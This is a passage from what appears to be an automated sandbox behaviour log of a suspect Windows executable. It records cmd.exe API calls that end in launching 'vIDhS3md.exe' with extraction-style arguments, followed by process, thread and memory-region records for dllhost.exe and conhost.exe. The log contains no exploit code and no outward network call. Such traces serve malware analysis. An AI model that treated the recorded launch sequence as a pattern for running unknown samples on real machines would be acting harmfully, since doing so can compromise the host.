(_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="FOR") returned 16 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="IF") returned 13 [0296.786] _wcsicmp (_String1="vIDhS3md.exe", _String2="REM") returned 4 [0296.786] _wcsnicmp (_String1="vIDh", _String2="cmd ", _MaxCount=0x4) returned 19 [0296.786] SetErrorMode (uMode=0x0) returned 0x0 [0296.786] SetErrorMode (uMode=0x1) returned 0x0 [0296.787] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x76b308, lpFilePart=0x5eead4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x5eead4*="Desktop") returned 0x1d [0296.787] SetErrorMode (uMode=0x0) returned 0x1 [0296.787] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0296.787] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0296.787] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0296.787] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0296.787] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", fInfoLevelId=0x1, lpFindFileData=0x5ee880, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5ee880) returned 0x76cb80 [0296.787] FindClose (in: hFindFile=0x76cb80 | out: hFindFile=0x76cb80) returned 1 [0296.787] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0296.787] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0296.787] GetConsoleTitleW (in: lpConsoleTitle=0x5eed54, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0296.787] InitializeProcThreadAttributeList (in: lpAttributeList=0x5eec80, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x5eec64 | out: lpAttributeList=0x5eec80, lpSize=0x5eec64) returned 1 [0296.787] UpdateProcThreadAttribute (in: lpAttributeList=0x5eec80, dwFlags=0x0, Attribute=0x60001, lpValue=0x5eec6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x5eec80, lpPreviousValue=0x0) returned 1 [0296.787] GetStartupInfoW (in: lpStartupInfo=0x5eecb8 | out: lpStartupInfo=0x5eecb8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="FN=\"Sey", _MaxCount=0x7) returned -3 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0296.788] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0296.788] lstrcmpW (lpString1="\\vIDhS3md.exe", lpString2="\\XCOPY.EXE") returned -1 [0296.788] CreateProcessW (in: lpApplicationName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", lpCommandLine="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x5eec08*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x5eec54 | out: lpCommandLine="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", lpProcessInformation=0x5eec54*(hProcess=0xb8, hThread=0xcc, dwProcessId=0xc74, dwThreadId=0xc78)) returned 1 [0296.795] CloseHandle (hObject=0xcc) returned 1 [0296.795] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0296.795] GetEnvironmentStringsW () returned 0x76b4d0* [0296.795] FreeEnvironmentStringsA (penv="=") returned 1 [0296.795] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) Thread: id = 837 os_tid = 0x580 Process: id = "84" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x19df2000" os_pid = "0xb04" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "40" os_parent_pid = "0x240" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5969 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5970 start_va = 0xee0a280000 end_va = 0xee0a29ffff entry_point = 0x0 region_type = private name = "private_0x000000ee0a280000" filename = "" Region: id = 5971 start_va = 0xee0a2a0000 end_va = 0xee0a2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ee0a2a0000" filename = "" Region: id = 5972 start_va = 0xee0a2c0000 end_va = 0xee0a3bffff entry_point = 0x0 region_type = private name = "private_0x000000ee0a2c0000" filename = "" Region: id = 5973 start_va = 0xee0a3c0000 end_va = 0xee0a3c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ee0a3c0000" filename = "" Region: id = 5974 start_va = 0x7df5ff610000 end_va = 0x7ff5ff60ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff610000" filename = "" Region: id = 5975 start_va = 0x7ff63d2c0000 end_va = 0x7ff63d2e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff63d2c0000" filename = "" Region: id = 5976 start_va = 0x7ff63d2e5000 end_va = 0x7ff63d2e5fff entry_point = 0x0 region_type = private name = "private_0x00007ff63d2e5000" filename = "" Region: id = 5977 start_va = 0x7ff63d2ee000 end_va = 0x7ff63d2effff entry_point = 0x0 region_type = private name = "private_0x00007ff63d2ee000" filename = "" Region: id = 5978 start_va = 0x7ff63dbd0000 end_va = 0x7ff63dbd6fff entry_point = 0x7ff63dbd0000 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe") Region: id = 5979 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5980 start_va = 0xee0a3d0000 end_va = 0xee0a3d1fff entry_point = 0x0 region_type = private name = "private_0x000000ee0a3d0000" filename = "" Region: id = 6104 start_va = 0xee0a280000 end_va = 0xee0a28ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ee0a280000" filename = "" Region: id = 6105 start_va = 0xee0a3e0000 end_va = 0xee0a49dfff entry_point = 0xee0a3e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6106 start_va = 0xee0a560000 end_va = 0xee0a65ffff entry_point = 0x0 region_type = private name = "private_0x000000ee0a560000" filename = "" Region: id = 6107 start_va = 0x7ff63d1c0000 end_va = 0x7ff63d2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff63d1c0000" filename = "" Region: id = 6108 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6109 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6110 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6111 start_va = 0xee0a660000 end_va = 0xee0a75ffff entry_point = 0x0 region_type = private name = "private_0x000000ee0a660000" filename = "" Region: id = 6112 start_va = 0x7ff63d2ec000 end_va = 0x7ff63d2edfff entry_point = 0x0 region_type = private name = "private_0x00007ff63d2ec000" filename = "" Region: id = 6113 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6114 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6115 start_va = 0xee0a760000 end_va = 0xee0a8fffff entry_point = 0x0 region_type = private name = "private_0x000000ee0a760000" filename = "" Region: id = 6116 start_va = 0xee0a290000 end_va = 0xee0a296fff entry_point = 0x0 region_type = private name = "private_0x000000ee0a290000" filename = "" Region: id = 6117 start_va = 0xee0a760000 end_va = 0xee0a835fff entry_point = 0xee0a760000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 6118 start_va = 0xee0a8f0000 end_va = 0xee0a8fffff entry_point = 0x0 region_type = private name = "private_0x000000ee0a8f0000" filename = "" Region: id = 6119 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 6120 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 6121 start_va = 0xee0a4a0000 end_va = 0xee0a4a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ee0a4a0000" filename = "" Region: id = 6122 start_va = 0xee0a4b0000 end_va = 0xee0a4b6fff entry_point = 0x0 region_type = private name = "private_0x000000ee0a4b0000" filename = "" Region: id = 6123 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 6124 start_va = 0xee0a4c0000 end_va = 0xee0a4c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ee0a4c0000" filename = "" Region: id = 6382 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6406 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 6407 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 6408 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 6409 start_va = 0xee0a900000 end_va = 0xee0ac36fff entry_point = 0xee0a900000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6410 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 6480 start_va = 0xee0a760000 end_va = 0xee0a85ffff entry_point = 0x0 region_type = private name = "private_0x000000ee0a760000" filename = "" Region: id = 6481 start_va = 0x7ff63d2ea000 end_va = 0x7ff63d2ebfff entry_point = 0x0 region_type = private name = "private_0x00007ff63d2ea000" filename = "" Region: id = 6484 start_va = 0xee0ac40000 end_va = 0xee0ad3ffff entry_point = 0x0 region_type = private name = "private_0x000000ee0ac40000" filename = "" Region: id = 6485 start_va = 0xee0ad40000 end_va = 0xee0ae3ffff entry_point = 0x0 region_type = private name = "private_0x000000ee0ad40000" filename = "" Region: id = 6486 start_va = 0xee0ae40000 end_va = 0xee0af3ffff entry_point = 0x0 region_type = private name = "private_0x000000ee0ae40000" filename = "" Region: id = 6487 start_va = 0x7ff63d2e3000 end_va = 0x7ff63d2e4fff entry_point = 0x0 region_type = private name = "private_0x00007ff63d2e3000" filename = "" Region: id = 6488 start_va = 0x7ff63d2e6000 end_va = 0x7ff63d2e7fff entry_point = 0x0 region_type = private name = "private_0x00007ff63d2e6000" filename = "" Region: id = 6489 start_va = 0x7ff63d2e8000 end_va = 0x7ff63d2e9fff entry_point = 0x0 region_type = private name = "private_0x00007ff63d2e8000" filename = "" Region: id = 6490 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6491 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6492 start_va = 0xee0a4d0000 end_va = 0xee0a503fff entry_point = 0xee0a4d0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6493 start_va = 0xee0af40000 end_va = 0xee0b0c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ee0af40000" filename = "" Region: id = 6494 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6495 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 6496 start_va = 0xee0a4d0000 end_va = 0xee0a4d0fff entry_point = 0x0 region_type = private name = "private_0x000000ee0a4d0000" filename = "" Region: id = 6497 start_va = 0xee0a4e0000 end_va = 0xee0a4e0fff entry_point = 0x0 region_type = private name = "private_0x000000ee0a4e0000" filename = "" Region: id = 6498 start_va = 0xee0b0d0000 end_va = 0xee0b250fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ee0b0d0000" filename = "" Region: id = 6499 start_va = 0xee0b260000 end_va = 0xee0c65ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ee0b260000" filename = "" Region: id = 6500 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 6501 start_va = 0xee0c660000 end_va = 0xee0c7fffff entry_point = 0x0 region_type = private name = "private_0x000000ee0c660000" filename = "" Region: id = 6551 start_va = 0x7ffae6ef0000 end_va = 0x7ffae6f3afff entry_point = 0x7ffae6ef0000 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 6552 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 6553 start_va = 0xee0a4f0000 end_va = 0xee0a4f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ee0a4f0000" filename = "" Region: id = 6554 start_va = 0x7ffaecc30000 end_va = 0x7ffaecea3fff entry_point = 0x7ffaecc30000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 6555 start_va = 0xee0a500000 end_va = 0xee0a500fff entry_point = 0xee0a500000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 6556 start_va = 0xee0a510000 end_va = 0xee0a511fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ee0a510000" filename = "" Region: id = 6557 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 6558 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6559 start_va = 0xee0c660000 end_va = 0xee0c7a0fff entry_point = 0xee0c660000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6560 start_va = 0xee0c7f0000 end_va = 0xee0c7fffff entry_point = 0x0 region_type = private name = "private_0x000000ee0c7f0000" filename = "" Thread: id = 798 os_tid = 0xa24 Thread: id = 805 os_tid = 0xe1c Thread: id = 825 os_tid = 0x444 Thread: id = 829 os_tid = 0x510 Thread: id = 830 os_tid = 0xf24 Thread: id = 831 os_tid = 0xf20 Thread: id = 835 os_tid = 0xf14 Process: id = "85" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x7a7b7000" os_pid = "0x7e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "81" os_parent_pid = "0xec4" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6133 start_va = 0x7f5ae000 end_va = 0x7f5aefff entry_point = 0x0 region_type = private name = "private_0x000000007f5ae000" filename = "" Region: id = 6134 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6135 start_va = 0x1dc8090000 end_va = 0x1dc80affff entry_point = 0x0 region_type = private name = "private_0x0000001dc8090000" filename = "" Region: id = 6136 start_va = 0x1dc80b0000 end_va = 0x1dc80c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001dc80b0000" filename = "" Region: id = 6137 start_va = 0x1dc80d0000 end_va = 0x1dc810ffff entry_point = 0x0 region_type = private name = "private_0x0000001dc80d0000" filename = "" Region: id = 6138 start_va = 0x7df5ff870000 end_va = 0x7ff5ff86ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff870000" filename = "" Region: id = 6139 start_va = 0x7ff7fd120000 end_va = 0x7ff7fd142fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fd120000" filename = "" Region: id = 6140 start_va = 